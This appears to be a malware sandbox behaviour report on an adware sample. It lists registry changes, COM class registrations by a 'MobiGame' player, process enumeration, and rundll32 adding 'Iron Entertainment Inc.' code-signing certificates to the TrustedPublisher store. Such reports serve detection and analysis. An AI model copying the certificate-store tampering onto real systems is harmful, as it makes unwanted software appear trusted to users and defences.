Key created \REGISTRY\USER\.DEFAULT C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property\0018400C2942BED0 = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000ce8561846f6cbb43a49c5e5b2b89893400000000020000000000106600000001000020000000ed17f948b483620142f397761ef2a0db60f0906872d346aa4a565ce6991ee40c000000000e8000000002000020000000c85e9bb4b53e667b9b2bc5cb23233c1e278bdfc69280b350ac41430b542f415a80000000089dd9aebf38bfde3a42b3f76645eed5288de9370c950233ce435d80eecee350fdc95c960da0dd9edc3f153188d5cc5456200c219a0c8a60fe3f30cf7fa0f8257e136d78cff2c75c87d0e00d0f6761b1307bb73fdf06113ce27f73a51d8527595af0350d63d91d372f7f7491c717e210797bd73bdca63d2d1fb49e21e40879d340000000ec04761ddcc883d26971d308e4cb9414b2a716deb80ae821f5031177e3879eed42958eaac1e00e084b5f49eb9d3558120969650006b4d89fb94de2a23078f46b C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\ApplicationAssociationToasts\AppX4hxtad77fbk3jkkeerkrm0ze94wjf3s9_.html = "0" C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice\Hash = "Hk6iTfgSClE=" C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Edge\PreferenceMACs\Default\software_reporter.prompt_seed = "C51FEA16CA9AC0F91E3DA98361D5F8D55B61F5E3DA5713F8D6B2F5ABBF0C95CC" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property\0018400C2942BED0 = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000ce8561846f6cbb43a49c5e5b2b898934000000000200000000001066000000010000200000004d915aa41ed0407351294917ca4de1ab7f63c9508b058dc5d58180a489892902000000000e8000000002000020000000171b1ac7ed88f5466cb2fb8ede9d2196d44e77a94ef83b372b7b9c4a951705a1800000008b786b8f89f85e4bc34a909e1df9b1ebc5f58fc7384b3d79750c37fbde92a6414397d608434cefcfbc76579476e6b57ae7287f379b36d3cbb1cd42957e4a50cffe6da88e8fc0725278a78523ea41abeda74cbc8be14e5c8eff0d53ad990f11621f870b63f647915c90e24fa2616dad13491c8a6b805dd4ad8d214e61bb91586c40000000ea067389a4e51a42e83d682aa1cb06b88eff6a89fbb9a5b672d483ed166d03a4084768704585d3ee6467e695fc6314537f81405e89acd6071bdd069ac9a36c9b C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\EdgeUpdate\ClientState\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}\metricsid = "7c0003c0-2586-49a0-b056-e063198e17c4" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Network\Location Awareness C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\.DEFAULT C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Users\Admin\Desktop\adwares\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\EdgeUpdate\ClientState\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}\metricsid_enableddate = "0" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C5CF2480-F6C2-11E7-AEB4-080027376349}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C4A82B42-F6C2-11E7-AEB4-080027376349} C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{c39f8f06-f6c2-11e7-aeb4-080027376349} C:\Windows\syswow64\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C5B37C12-F6C2-11E7-AEB4-080027376349}\TypeLib C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Microsoft.Website\ = "Pinned Site Shortcut" C:\Windows\servicing\TrustedInstaller.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0002DF01-0000-0000-C000-000000000046} C:\Windows\system32\ie4uinit.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C4AE6912-F6C2-11E7-AEB4-080027376349}\ = "IGuestSession" C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C45A3482-F6C2-11E7-AEB4-080027376349} C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C5BAE132-F6C2-11E7-AEB4-080027376349}\ = "IGuestPropertyChangedEvent" C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C488A272-F6C2-11E7-AEB4-080027376349}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C5B87F82-F6C2-11E7-AEB4-080027376349} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\FriendlyTypeName = "@C:\\Windows\\system32\\ieframe.dll,-912" C:\Windows\servicing\TrustedInstaller.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C5C08D94-F6C2-11E7-AEB4-080027376349}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C46D71A0-F6C2-11E7-AEB4-080027376349}\TypeLib C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C5BF22C4-F6C2-11E7-AEB4-080027376349}\TypeLib C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\svgfile\shell\open\CommandId = "IE.File" C:\Windows\system32\ie4uinit.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\xhtmlfile\shell\print\command\ = "\"C:\\Windows\\system32\\rundll32.exe\" \"C:\\Windows\\system32\\mshtml.dll\",PrintHTML \"%1\"" C:\Windows\system32\ie4uinit.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C4D0F3A6-F6C2-11E7-AEB4-080027376349}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C4E451BC-F6C2-11E7-AEB4-080027376349}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C59E6D04-F6C2-11E7-AEB4-080027376349}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C4CC036E-F6C2-11E7-AEB4-080027376349}\ProxyStubClsid32 C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C5BAE132-F6C2-11E7-AEB4-080027376349}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\VirtualBox.Session\ = "Session Class" C:\Windows\syswow64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C3FC5D26-F6C2-11E7-AEB4-080027376349} C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C5B766CE-F6C2-11E7-AEB4-080027376349} C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C4EA71BE-F6C2-11E7-AEB4-080027376349}\TypeLib\Version = "1.3" C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C59D712E-F6C2-11E7-AEB4-080027376349}\TypeLib C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C5B83126-F6C2-11E7-AEB4-080027376349}\TypeLib\ = "{C39F7A20-F6C2-11E7-AEB4-080027376349}" C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.xht\Content Type = "application/xhtml+xml" C:\Windows\system32\ie4uinit.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\open\CommandId = "IE.File" C:\Windows\system32\ie4uinit.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C5AFE8D6-F6C2-11E7-AEB4-080027376349}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\VirtualBox.VirtualBoxClient\CurVer C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C3FE2822-F6C2-11E7-AEB4-080027376349}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C5CFDDBC-F6C2-11E7-AEB4-080027376349}\TypeLib\ = "{C39F7A20-F6C2-11E7-AEB4-080027376349}" C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C5D035A0-F6C2-11E7-AEB4-080027376349}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C5A1EC90-F6C2-11E7-AEB4-080027376349}\TypeLib C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C5DFA648-F6C2-11E7-AEB4-080027376349}\TypeLib C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C5D2BFFA-F6C2-11E7-AEB4-080027376349}\TypeLib\Version = "1.3" C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\https\DefaultIcon C:\Windows\servicing\TrustedInstaller.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C5B766CE-F6C2-11E7-AEB4-080027376349}\TypeLib\ = "{C39F7A20-F6C2-11E7-AEB4-080027376349}" C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C5CF9104-F6C2-11E7-AEB4-080027376349}\TypeLib C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C5D83D68-F6C2-11E7-AEB4-080027376349}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C5809F54-F6C2-11E7-AEB4-080027376349}\TypeLib C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{c5e1ec0a-f6c2-11e7-aeb4-080027376349}\ProgId C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C56D9116-F6C2-11E7-AEB4-080027376349}\TypeLib C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C5BD4C42-F6C2-11E7-AEB4-080027376349}\TypeLib\Version = "1.3" C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C5D0CC36-F6C2-11E7-AEB4-080027376349}\ = "IUSBControllerChangedEvent" C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C5E0FE1C-F6C2-11E7-AEB4-080027376349}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C555FED4-F6C2-11E7-AEB4-080027376349} C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C585CBDC-F6C2-11E7-AEB4-080027376349}\TypeLib\ = "{C39F7A20-F6C2-11E7-AEB4-080027376349}" C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C59D712E-F6C2-11E7-AEB4-080027376349}\ProxyStubClsid32 C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C4E451BC-F6C2-11E7-AEB4-080027376349}\ = "IProgress" C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C5BA062C-F6C2-11E7-AEB4-080027376349}\ProxyStubClsid32 C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C5CA4898-F6C2-11E7-AEB4-080027376349}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C5D83D68-F6C2-11E7-AEB4-080027376349}\ProxyStubClsid32 C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{c5e1ec0a-f6c2-11e7-aeb4-080027376349} C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C3BF33A6-F6C2-11E7-AEB4-080027376349}\TypeLib C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C3C3C600-F6C2-11E7-AEB4-080027376349} C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C4D0A748-F6C2-11E7-AEB4-080027376349} C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C46D71A0-F6C2-11E7-AEB4-080027376349}\ProxyStubClsid32 C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C5C4A118-F6C2-11E7-AEB4-080027376349} C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C4A6F0EC-F6C2-11E7-AEB4-080027376349}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C58CEC78-F6C2-11E7-AEB4-080027376349} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ftp\shell\open\CommandId = "IE.Protocol" C:\Windows\servicing\TrustedInstaller.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\E74B8BC01BC843C34D710E29DE0411564BADC2F2 C:\Windows\system32\rundll32.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\E74B8BC01BC843C34D710E29DE0411564BADC2F2\Blob = 030000000100000014000000e74b8bc01bc843c34d710e29de0411564badc2f22000000001000000900500003082058c30820474a00302010202100d7b87bf9200d82906f619b5ee6c603f300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3137303731343030303030305a170d3138303731383132303030305a3081ab31133011060b2b0601040182373c02010313025647311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e3110300e0603550405130731383137383033310b30090603550406130256473112301006035504071309526f616420546f776e3120301e060355040a131749726f6e20456e7465727461696e6d656e7420496e632e3120301e0603550403131749726f6e20456e7465727461696e6d656e7420496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100adccd719ce3b4f84d425e2b3dbbf3273f8367a02e55980fb8b12d0ec202c5bbc0d40ed46059f647e65139a82317acf7f6c441043d6143f8e23097502d3c6ea25255b91fd27949261f4eac63539b1435624791be516dbf3e5d5803fd396a07c238e7c3a7e7be480b8f1e36a08d4fb7ff1ef640c7a6f00904dd3fb5f96ef5f4e7e47baeeed47bdf254fee13bf4a4e72ce5eb7451ae0cf675ad9d19dfed29621f3cc64b3bcdd7dca22b601c39ea6039603128748b1ab4acd40d3d4f53a41a862687424a55e2a56ede2909a81b695cdc2f6e16dc54864eab896765a75d10c0d156156029c91ac22daa455c8d1b853d4a330fce0de6c83b9ad632646509889134d6930203010001a38201e8308201e4301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149709754f51dc8fa3bf2e4540e443dc015d8816ca30250603551d11041e301ca01a06082b06010505070803a00e300c0c0a56472d31383137383033300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101002f9a80a913a1d71b909c639c165ca1603d5ce7fdac7b50a4eb5d18d334d2f9d35cda3aea2e9239994a6910e122d312ad9211aebc525b54d6b480bdc1c969ff237aae64718cc06ddc194bfd735794d9d889019c1903ef81fbb1eb993aae57ef2dd9665b8a4e8265e15da21281a6526dee2c183e84c696f40a9072df9bfe5c878f3fbbc6826c780a136b05d4f97aa21c671e0a0b58f36be031a532979fbb57879b7772c50cb394ce0ea1e6688936168621ce55f9c83a7589a501d67cdd75616748aa6524f0c0867971b56b73f1e5beb3f6e4341dc6d7f4acac6f0438317b0e6d3c35116f7d9c3a2d401ff79579d791621a3500525bf068199d2ecb0c77040a9d28 C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4D56E7AC803733AEB63F6B8217F4BE35DFE6C42E C:\Windows\system32\rundll32.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4D56E7AC803733AEB63F6B8217F4BE35DFE6C42E\Blob = 0300000001000000140000004d56e7ac803733aeb63f6b8217f4be35dfe6c42e20000000010000007c0500003082057830820460a0030201020210019549f3e9c1fd841c29b1f2c2bdd013300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b446967694365727420455620436f6465205369676e696e67204341301e170d3138303230313030303030305a170d3139303132343132303030305a3081ab31133011060b2b0601040182373c02010313025647311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e3110300e0603550405130731383137383033310b30090603550406130256473112301006035504071309526f616420546f776e3120301e060355040a131749726f6e20456e7465727461696e6d656e7420496e632e3120301e0603550403131749726f6e20456e7465727461696e6d656e7420496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a69529c8ded2a23c241b5d3223350310da8bc4c1e27e4f38de191a07c5c3e54105693aa3ecda48b1a6be745a22f6d2617e99ee326e2ee0aff2d2fb01d02a3c2aa03b0a9048d0ada52e6bce2dff81d755729ac88e1818c2665fd9007e9036b0b44a29cbfe4717c0fbbf4370768fe22f37c8be5367db93801592886db3031f7e6a67a36187480957700863fd585152c1b47c4ee0a425533fb659f96b3c826e2a3b43d83e182d06d1eaded7f282b4b375b66ec18ad6e2c2612075644ae549112d938f62647c8904720c810976bf982fb27d0b32674f36945d4515f357616429bfba6975b141c22b59ab705d063aecd315a67fd29ddef8ee550acee03e4ab3b256ff0203010001a38201db308201d7301f0603551d23041830168014ad690670fc801b16b3a918946b9402865ef7278c301d0603551d0e04160414ecafaebf1f8d1389e1c8a95226a9938391dcf69130250603551d11041e301ca01a06082b06010505070803a00e300c0c0a56472d31383137383033300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e672d67312e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e672d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307906082b06010505070101046d306b302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304306082b060105050730028637687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412e637274300c0603551d130101ff04023000300d06092a864886f70d01010505000382010100a8590e5af448e75c68937d3c422d3edf1fe3e34f7cb11190a01bfd96c8c1b9c35a473e310ea84296fba0025a747f6247a3d87f2fdbf4a605897c4664567428eb2587b24cbcbb98e73f297bb94470e9d9332d490c5991be31835da48d9d0ff75d15107a81e1779acfc716f41d502c75527e0f2014e8af38de3f051fe2dc0e0dc0582d0f85c87d489e5608fa62044ea83503931b7016675d90f1f56e161d2ec066cd3147239c120eea6b1386f254a4d83d83f4d907652a1e9b3d36d88d21b9af7e5db8bf412e333b503d23b23144b0b0c219435182674e9d503984f820d374707031daed98ed8c44b9d540ab8cd94cab9991d72c5e6518db258236dc44eacb5305 C:\Windows\system32\rundll32.exe N/A

NTFS ADS

Description Indicator Process Target
File created C:\Users\Admin\Downloads\2023-11-23-05.zip:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
File created C:\Users\Admin\Downloads\2023-11-23-04.zip:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
